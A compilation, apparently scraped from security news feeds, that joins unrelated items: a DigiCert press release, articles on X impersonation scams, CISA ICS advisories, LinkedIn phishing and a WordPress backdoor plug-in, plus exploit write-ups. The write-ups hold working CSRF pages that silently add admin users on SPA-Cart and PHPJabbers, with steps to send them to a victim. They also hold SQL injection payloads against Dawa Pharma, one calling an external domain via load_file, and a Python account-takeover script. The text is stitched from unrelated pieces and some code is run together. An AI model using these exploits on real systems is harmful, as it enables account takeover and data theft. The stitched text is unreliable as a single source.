**PRESS RELEASE**

**(Lehi, UT) Oct. 12, 2023 —** DigiCert, a leading global provider of digital trust, today announced its next generation Discovery, a set of key capabilities in DigiCert® Trust Lifecycle Manager that enable customers to build a centralized book of record of their cryptographic keys and certificates. This centralized view, when coupled with management and automated provisioning and renewal, improves cryptoagility, reducing the time and resources needed to update algorithms, rotate keys and certificates and remediate threats.

"The majority of organizations have not yet implemented a centralized crypto-management solution," said DigiCert Chief Product Officer Deepika Chauhan. "This is becoming critical now, as IT leaders consider how to transition their cryptographic algorithms and certificates to quantum-safe standards in order to protect their organizations against 'harvest now, decrypt later' strategies."

In a recent Gartner® report1, Senior Director Analyst Brian Lowans wrote, "All cryptographic technologies will need to evolve to cope with the future threat of quantum computing, which is increasing the need for innovative technologies such as crypto-agility, postquantum cryptography and quantum key distribution."

Trust Lifecycle Manager Discovery employs a broad set of methods for finding certificates within an organization, including integration with private CAs, such as AWS Private CA and Microsoft CA, integration with vulnerability management solutions such as Qualys and Tenable, integrations with web servers and load balancers, and port-based scanning. 

"The integration of Qualys Vulnerability Management, Discovery and Response (VMDR) and DigiCert products enables our customers to manage and automate the cryptographic assets that they discover in their vulnerability scans," said Pinkesh Shah, Chief Product Officer, Qualys. "This seamless integration enables companies to tightly couple their vulnerability management and cryptoagility strategies, improving their security posture and agility while reducing their cyber risk."

Learn more about Trust Lifecycle Manager Discovery here. 

1.  Gartner, Hype Cycle™ for Data Security, 2023, Brian Lowans, 14 July 2023

GARTNER and HYPE CYCLE are registered trademarks of Gartner, Inc. and/or its affiliates in the US and internationally and is used herein with permission. All rights reserved.

**About DigiCert, Inc.**  
DigiCert is a leading global provider of digital trust, enabling individuals and businesses to engage online with the confidence that their footprint in the digital world is secure. DigiCert® ONE, the platform for digital trust, provides organizations with centralized visibility and control over a broad range of public and private trust needs, securing websites, enterprise access and communication, software, identity, content and devices. DigiCert pairs its award-winning software with its industry leadership in standards, support and operations, and is the digital trust provider of choice for leading companies around the world. For more information, visit www.digicert.com or follow @digicert.

DigiCert Announces Comprehensive Discovery of Cryptographic Assets

Scammers have targeted the vaunted blue check marks on the platform formerly known as Twitter, smearing individuals and brands alike.

Fraudsters are taking advantage of the new verification system implemented by X, formerly known as Twitter, in order to impersonate brands and steal personal information.

The infamous blue checkmark used to be reserved for verified companies and influencers. But after purchasing the microblogging giant, and following a period of rapidly declining users and revenue, Elon Musk changed the rules, enabling anybody to obtain one simply by paying a monthly fee.

The site's new, liberal approach to authentication has opened the door for scammers, while the introduction of other tiers of "authentication" — gold and gray badges, for instance — has created confusion for brands and users alike.

Dark Reading was unable to reach X for comment on this story.

**How Blue Check Scams Work**

In July, the budget British airline easyJet canceled over 1,700 summer flights from Gatwick Airport in London.

Anticipating a wave of angry customers, scammers filled in the void.

According to the UK nonprofit Which?, a bevy of copycat easyJet accounts were created in the hours thereafter, with at least five surviving an initial sweep of account shutdowns. Their usernames mimicked the company's legitimate username, and in their bios they linked to "Online Help Hubs," which were actually just phishing pages designed to harvest personal information. The scammers also engaged angry customers over direct messages, and occasionally intervened in conversations they were having with the actual company.

_Source: Which?_

Not all of the blame lies with X, though. Companies that shirk on customer service often direct angry customers to social media instead, since it's allegedly faster (read: more cost-effective).

One UK resident told The Guardian in August how, after months of fruitlessly attempting to get a refund on a canceled holiday flight, he finally conceded to engage with Booking.com over X.

Booking.com asked him to send them his phone number via DM. After a call over WhatsApp, they agreed to refund his payment, but he would first need to download an app.

Only then, with his suspicion aroused, did the man realize the company's account handle had an unexpected hyphen in it, and their WhatsApp caller ID traced to Kenya.

"I've since come across other fake Booking.com Twitter accounts which are following customers who are at their wits' end trying to get a refund and have resorted to X to air their grievance with the company,” he recalled to reporters.

**Reckoning With the New Check Mark System**

Rather than just the blue check mark, X currently offers four tiers for accounts:

*   The blue check now only reflects that a user pays for an "X Premium" monthly subscription.
*   Gray check marks are reserved for government bodies and officials.
*   Gold check marks replace the blue, to authenticate official corporate accounts.
*   Individuals associated with organizations may also have a logo next to their names.

A gold badge costs $1,000 per month (plus $50 for additional affiliates), meaning that small businesses may not be able to afford authentication, and larger ones may not want to pay. And it's even led to inconsistencies within organizations. In a blog published Thursday, Kaspersky highlighted how Microsoft's presence on X is a mess of accounts with and without gold check marks, some affiliated with the organization and some not.

**What Companies Can Do About X Brand Impersonation**

Companies unable (or unwilling) to shell out the cash and organize around X's new rules — and companies like easyJet, for whom even doing everything right isn't enough to fend off copycats — will need other means of protecting their customers and their brand names. Because like any typosquatting endeavor, a diligent phishing campaign can erode consumer trust.

"For sensitive communication or support," says Callie Guenther, senior manager of threat research at Critical Start, "directing customers back to the official website or a recognized customer service number can be effective. And a consistent online presence, characterized by regular updates and engagement, can deter impersonators and give customers confidence in the brand's authenticity."

However, she cautions, "any system that implies trust through verification can be exploited, so users should always be cautious. LinkedIn, for example, doesn't have a checkmark system similar to Twitter, but fake profiles or impersonators can still exist."

Brands Beware: X's New Badge System Is a Ripe Cyber-Target

An unsafe default configuration in KNIME Analytics Platform before 5.2.0 allows for a cross-site scripting attack. When KNIME Analytics Platform is used as an executor for either KNIME Server or KNIME Business Hub several JavaScript-based view nodes do not sanitize the data that is displayed by default. If the data to be displayed contains JavaScript this code is executed in the browser and can perform any operations that the current user is allowed to perform silently.




KNIME Analytics Platform already has configuration options with which sanitization of data can be actived, see  https://docs.knime.com/latest/webportal_admin_guide/index.html#html-sanitization-webportal https://docs.knime.com/latest/webportal_admin_guide/index.html#html-sanitization-webportal . However, these are off by default which allows for cross-site scripting attacks.


KNIME Analytics Platform 5.2.0 will enable sanitization by default. For all previous releases we recommend users to add the corresponding settings to the executor's knime.ini.




CVE-2023-5562

By Waqas
New CISA Advisories Highlight Vulnerabilities in Siemens, Mitsubishi Electric, Hikvision, and Schneider Electric ICS Products.
This is a post from HackRead.com Read the original post: New CISA Advisories Highlight Vulnerabilities in Top ICS Products

It is important for users and administrators of ICS systems to take steps to mitigate the vulnerabilities identified in the CISA advisories.

The Cybersecurity and Infrastructure Security Agency (CISA) released nineteen Industrial Control Systems (ICS) advisories on October 12, 2023. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

The advisories cover a wide range of ICS products and vendors, including Siemens, Mitsubishi Electric, Hikvision, and Schneider Electric. The vulnerabilities identified in the advisories range in severity from low to critical. Some of the vulnerabilities could allow attackers to gain unauthorized access to ICS systems, disrupt operations, or even cause physical issues.

CISA encourages users and administrators of ICS systems to review the newly released advisories for technical details and mitigations. Here are some of the key vulnerabilities identified in the CISA advisories:

*   **Siemens SIMATIC CP products:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a remote code execution attack.
*   **Siemens SCALANCE W1750D:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a buffer overflow attack.
*   **Siemens SICAM A8000 Devices:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a SQL injection attack.
*   **Mitsubishi Electric MELSEC-F Series:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a cross-site scripting (XSS) attack.
*   **Hikvision Access Control and Intercom Products:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a buffer overflow attack.
*   **Schneider Electric IGSS:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a SQL injection attack.

ICSA-23-285-08 Siemens SINEC NMS
ICSA-23-285-15 Advantech WebAccess
ICSA-23-285-06 Siemens SICAM PAS/PQS
ICSA-23-285-16 Schneider Electric IGSS
ICSA-23-285-02 Siemens SCALANCE W1750D
ICSA-23-285-07 Siemens RUGGEDCOM APE180
ICSA-23-285-05 Siemens Simcenter Amesim
ICSA-23-285-12 Weintek cMT3000 HMI Web CGI
ICSA-23-285-03 Siemens SICAM A8000 Devices
ICSA-23-285-01 Siemens SIMATIC CP products
ICSMA-23-285-02 Santesoft Sante FFT Imaging
ICSA-23-285-04 Siemens Xpedition Layout Browser
ICSMA-23-285-01 Santesoft Sante DICOM Viewer Pro
ICSA-23-243-03 PTC Kepware KepServerEX (Update A)
ICSA-23-285-10 Siemens Tecnomatix Plant Simulation 
ICSA-23-285-13 Mitsubishi Electric MELSEC-F Series
ICSA-23-285-11 Siemens Mendix Forgot Password Module
ICSA-23-285-14 Hikvision Access Control and Intercom Products
ICSA-23-285-09 Siemens CPCI85 Firmware of SICAM A8000 Devices

CISA recommends that users and administrators of ICS systems take the following steps to mitigate these vulnerabilities:

*   Monitor ICS systems for suspicious activity.
*   Develop and implement an incident response plan.
*   Apply security patches from vendors as soon as they are available.
*   Implement a layered security approach that includes network segmentation, firewalls, and intrusion detection systems.

ICS systems are used to control critical infrastructure, such as power grids, water treatment systems, and transportation networks. A successful cyber attack on an ICS system could have devastating consequences.

It is important for users and administrators of ICS systems to take steps to mitigate the vulnerabilities identified in the CISA advisories. In addition to the steps recommended by CISA, organizations that operate ICS systems should also consider the following:

*   Conduct regular security assessments of ICS systems to identify and address vulnerabilities.
*   Develop and implement a security awareness training program for employees who use ICS systems.
*   Keep ICS systems isolated from the internet and other untrusted networks.
*   Use strong passwords and enable multi-factor authentication for all ICS systems.

By taking these steps, organizations can protect their ICS systems from cyberattacks, especially the increasingly prevalent cybersecurity threat of ransomware attacks, and minimize the risk of disruption to their operations.

****_RELATED ARTICLES_****

1.  CISA Publishes List of Free Cybersecurity Tools and Services
2.  Major ransomware attack cripples largest gas pipeline in the US
3.  GreyEnergy: New malware targeting energy sector with espionage
4.  Siemens ALM 0-Day Vulnerabilities Posed Full Remote Takeover Risk
5.  Crit.IX: Flaws in Honeywell Experion DCS, Posing Risk to Critical Industries

New CISA Advisories Highlight Vulnerabilities in Top ICS Products

SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

\# CVE-2023-43149
#Author : Aitor Herrero Fuentes

# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/admin
# Version: 1.9.0.3
# Tested on: Windows 10 Pro

CSRF ADD ROOT ACCOUNT

Cross Site Request Forgery vulnerability in application demo.spa-cart.com allows a remote attacker to execute arbitrary code , add an malicius  user with "role status" with one click  
A CSRF vulnerability occurs when a malicious actor can trick a victim into performing an action that they did not intend to perform. In this case, the malicious actor could trick the victim into clicking on a link or opening a file that contains malicious code.
This code could then be used to delete all accounts.


POC

 1 - Make an file with with this CODE and SAVE in HTML 
 Attack Delete  All Account

<html>
    <body>
    <form action="https://demo.spa-cart.com/admin/user/859" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="posted&#95;data&#91;firstname&#93;" value="mal1" />
      <input type="hidden" name="posted&#95;data&#91;lastname&#93;" value="mal2" />
      <input type="hidden" name="posted&#95;data&#91;phone&#93;" value="156415641561" />
      <input type="hidden" name="posted&#95;data&#91;email&#93;" value="mal1&#64;test&#46;com" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="posted&#95;data&#91;usertype&#93;" value="C" />
      <input type="hidden" name="posted&#95;data&#91;roleid&#93;" value="1" />
      <input type="hidden" name="posted&#95;data&#91;status&#93;" value="1" />
      <input type="hidden" name="posted&#95;data&#91;address&#93;" value="" />
      <input type="hidden" name="posted&#95;data&#91;city&#93;" value="" />
      <input type="hidden" name="posted&#95;data&#91;state&#93;" value="" />
      <input type="hidden" name="posted&#95;data&#91;country&#93;" value="AG" />
      <input type="hidden" name="posted&#95;data&#91;zipcode&#93;" value="05584" />
      <input type="hidden" name="posted&#95;data&#91;pending&#95;membershipid&#93;" value="1" />
      <input type="hidden" name="posted&#95;data&#91;membershipid&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>


2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click at the button
the code will changes in his actually session.

CVE-2023-43149: GitHub - MinoTauro2020/CVE-2023-43149: CVE-2023-43149

By Deeba Ahmed
LinkedIn and Microsoft users, watch out for this phishing scam!
This is a post from HackRead.com Read the original post: LinkedIn Phishing Scam Exploits Smart Links to Steal Microsoft Accounts

Cofense cybersecurity researchers have noticed a sudden uptick in phishing messages sent via LinkedIn, as they observed around 800 emails sent between July and August 2023.

****_KEY FINDINGS_****

*   **A new LinkedIn phishing scam targets users to steal their Microsoft account login credentials.**

*   **Phishing actors are exploiting LinkedIn’s Smart Link feature to evade email security mechanisms and redirect users to phishing pages designed to steal financial data.**

*   **The Smart Links feature is part of LinkedIn Sales Navigator and Enterprise and allows users to send up to 15 documents with a single trackable link.**

*   **Phishing actors are interested in exploiting Smart Links to make their phishing emails seem legitimate and appear to be sent by a trusted source apart from bypassing email protections.**

*   **This campaign targets diverse industries, but the most prominent targets are the finance and manufacturing sectors.**

If you use **LinkedIn** to connect with your colleagues or industry experts, then you should feel alert because, in the newly discovered phishing campaign, threat actors are abusing a legitimate feature of LinkedIn to send authentic-looking phishing emails.

According to a report from email security firm Cofense, the feature exploited in this campaign is **Smart Links**, part of the LinkedIn Sales Navigator and Enterprise service. Phishers are abusing it to steal payment data. They exploit Smart Links to bypass email protection mechanisms and deliver malicious lures into the email inboxes of Microsoft users. Cofense

Cofense cybersecurity researchers have noticed a sudden uptick in phishing messages sent via LinkedIn, as they observed around 800 emails sent between July and August 2023. These emails were sent through 80 unique Smart Links and mostly lured users with payments, essential documents, security notifications, or recruitment-related messages.

According to Cofense’s blog post, all the messages contained an embedded link/button to redirect the victim to a malicious website where the attackers compel them to give away personal/financial data or login credentials. 

The report’s author, Cofense cyber threat intelligence analyst Nathaniel Raymond, noted that this campaign most probably exploits newly created or compromised business accounts on LinkedIn to deliver malicious lures and forces users to provide their Microsoft account details.

Clicking on viewing document opens a fake Microsoft login page that steals credentials (Image credit: Cofense)

For your information, this feature allows businesses to promote ads or websites and redirect users to their desired domains. This tool lets business account holders contact LinkedIn users via trackable ‘smart’ links. The sender can track who interacted with their messages and in what manner. Therefore, this tool is ideal for pitch testing and enhancing the process.

The smart link includes the LinkedIn domain with a parameter and an eight-alphanumeric character ID. However, adversaries have added new information, such as the recipient’s email ID, to autofill the phishing page the victim gets redirected to.

Employees at a wide range of organizations are targeted in this campaign, including manufacturing, financial, energy, construction, insurance, health, mining, consumer goods, and technology. But manufacturing and financial organizations were the top targets.

> _“Despite finance and manufacturing having higher volumes, it can be concluded that this campaign was not a direct attack on any one business or sector but a blanket attack to collect as many credentials as possible using LinkedIn business accounts and smart links to carry out the attack.”_
> 
> Nathaniel Raymond – Cofense

To protect yourself against malicious phishing links, you must be wary of emails from unknown users, even if the email came from an authentic source or domain. Only click on links embedded in the email if you believe the email is legit, and if you are unsure, a good idea is to contact the sender directly to verify it. Use a reliable password manager to create unique passwords for online accounts and **enable 2FA** on all of them.

1.  New LinkedIn phishing campaign found using Google Forms
2.  Fake LinkedIn job offers scam spreading More\_eggs backdoor
3.  Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack
4.  Ducktail Malware Exploits LinkedIn to Hack Facebook Business Accounts
5.  Hackers Used Fake LinkedIn Job Offer to Hack Off $625M from Axie Infinity

LinkedIn Phishing Scam Exploits Smart Links to Steal Microsoft Accounts

PHPJabbers Limo Booking Software 1.0 is vulnerable to Cross Site Request Forgery (CSRF) to add an admin user via the Add Users Function, aka an index.php?controller=pjAdminUsers&action=pjActionCreate URI.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

\# CVE-2023-43147

 Vendor: PHPJabbers
 Vendor Homepage: https://www.phpjabbers.com/
 Software Link: https://www.phpjabbers.com/limo-booking-software
 Version: 1.0
 Tested on: Windows 10 Pro
 Impact: Add an attacker user with admin privileges
 CVE:

 Cross Site Request Forgery vulnerability in limo-booking-software allows a remote attacker to execute add and user with admin privileges
 

POC
 1 - Make an file with with this CODE and SAVE in HTML . If you save a new request to make a CSRF be sure that you change role\_id=0 to 1 (role\_id=1)

 <html>
    <body>
    <form action="https://demo.phpjabbers.com/1694190842\_980/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST">
      <input type="hidden" name="user&#95;create" value="1" />
      <input type="hidden" name="role&#95;id" value="1" />
      <input type="hidden" name="email" value="hacker&#64;admin&#46;tor" />
      <input type="hidden" name="password" value="admin1234" />
      <input type="hidden" name="name" value="admintor" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="status" value="T" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>

2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click at the button the code will changes in his actually session and one user will add in the panel admin
with admin privileges.

CVE-2023-43147: GitHub - MinoTauro2020/CVE-2023-43147: CVE-2023-43148

Evasive malware disguised as a caching plug-in allows attackers to create an admin account on a WordPress site, then take over and monetize sites at the expense of legitimate SEO and user privacy.

Sophisticated malware capable of creating an administration account for a website is lurking behind an authentic-looking WordPress caching plug-in, giving threat actors a way to completely hijack infected websites at will.

Researchers from Wordfence discovered the plug-in, which can perform a variety of malicious tasks while masquerading as legitimate add-on software for the WordPress platform, they revealed in a blog post Oct. 11. Chief among this activity is the ability to create an admin account and remotely activate plug-ins — basically giving threat actors free rein over infected sites.

The backdoor can work both as a standalone script and also as a plug-in, with features like remote plug-in activation and conditional content filtering that give it evasion capabilities difficult for inexperienced users to detect.

Other capabilities include the ability to add filters to prevent the malware from being included in the list of activated plug-ins, pinging functionality that allows a malicious actor to check if the script is still operational, and file-modification capabilities. Further, the backdoor can activate or deactivate arbitrary plug-ins remotely, which is "useful to disable unwanted plug-ins and also to activate this malicious plug-in as needed," Wotschka wrote.

"Since the malicious file runs as a plug-in within the context of WordPress, it does have access to normal WordPress functionality just like other plug-ins do," Wordfence vulnerability researcher Marco Wotschka wrote in the post. "Taken together, these features provide attackers with everything they need to remotely control and monetize a victim site, at the expense of the site’s own SEO rankings and user privacy."

A Wordfence analyst discovered a sample of the malware during a site clean on July 18, and created a signature the following day, which was subsequently tested and released to Wordfence customers on Sept. 1.

**Malicious Plug-in: A Hidden but Detectable Malware Enemy**

The researchers broke down some of the key functionality of the malicious plug-in, including features that are most likely to arise suspicion among current site administrators or users.

One of those is to use wp\_create\_user function to create a new user account with the username superadminand a hardcoded password to set up an attacker as a website administrator. This account is removed once a victim has been successfully compromised as a way to remove traces and thus reduce changes of detection, according to Wordfence.

"While often seen in test code, user creation with hardcoded passwords should be considered a red flag, and the elevation of this user to an administrator is certainly reason enough for suspicion," Wotschka wrote.

The malicious plug-in also includes bot detection code, which is often present in malware on a website that serves normal content to some users while redirecting or presenting malicious content to others.

"One common thread shared by these infection scenarios is that site owners find their site looks fine to them, but their visitors have reported issues such as seeing spam or being redirected to dubious sites," Wotschka explained.

Further, since this kind of malware wants search engines to find the malicious content, it is usually served to them as they index a site, he said. Threat actors use keyword stuffing to help increase traffic sent to infected sites, with administrators often reporting a sudden, unexpected surge in site traffic when their sites are hit by an infection.

While the presence of bot detection code on its own is not enough to verify that malicious activity is present on a website, it does stand out as suspicious activity, Wotschka added.

**Securing WordPress Sites**

Plug-ins remain an exposed and sizeable attack surface for WordPress and the millions of sites built on it, an endemic issue that remains a persistent threat. Threat actors have targeted WordPress sites via both malicious and vulnerable plug-ins, with both issues often going unnoticed by site operators until after a website is already under active attack.

Overall, anyone building websites using WordPress should follow security best practices in how they configure the sites to ensure they remain as protected as possible. Wordfence advised that they should also include some type of security monitoring on the site in case of compromise even after following these practices.

Backdoor Lurks Behind WordPress Caching Plug-in to Hijack Websites

Dawa Pharma version 1.0-2022 suffers from a remote SQL injection vulnerability.

    ## Title: dawa-pharma-1.0-2022 Multiple-SQLi## Author: nu11secur1ty## Date: 10/12/2023## Vendor: https://www.mayurik.com/## Software: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download## Reference: https://portswigger.net/web-security/sql-injection## Description:The email parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+'was submitted in the email parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all the information for the clientsof this application from the server, and very sensitive informationfor accessing the server by exploiting the vulnerability.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```MySQL---Parameter: email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: email=-8698' OR 5305=5305-- vvuH&password=mayurik&login=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=mayuri.infospace@gmail.com'+(selectload_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+''AND (SELECT 4515 FROM (SELECT(SLEEP(15)))KUth)--VRdC&password=mayurik&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/dawa-pharma-1.0-2022)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/10/dawa-pharma-10-2022-multiple-sqli.html)## Time spent:00:37:00

Dawa Pharma 1.0-2022 SQL Injection

Lost and Found Information System version 1.0 suffers from an insecure direct object reference vulnerability that allows for account takeover.

    # Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over # Date: 2023-12-03# Exploit Author: OR4NG.M4N# Category : webapps# CVE : CVE-2023-38965Python p0c :import argparseimport requestsimport timeparser = argparse.ArgumentParser(description='Send a POST request to the target server')parser.add_argument('-url', help='URL of the target', required=True)parser.add_argument('-user', help='Username', required=True)parser.add_argument('-password', help='Password', required=True)args = parser.parse_args()url = args.url + '/classes/Users.php?f=save'data = {    'id': '1',    'firstname': 'or4ng',    'middlename': '',    'lastname': 'Admin',    'username': args.user,    'password': args.password}response = requests.post(url, data)if b"1" in response.content:    print("Exploit ..")    time.sleep(1)    print("User :" + args.user + "\nPassword :" + args.password)else:    print("Exploit Failed..")

Tag

#web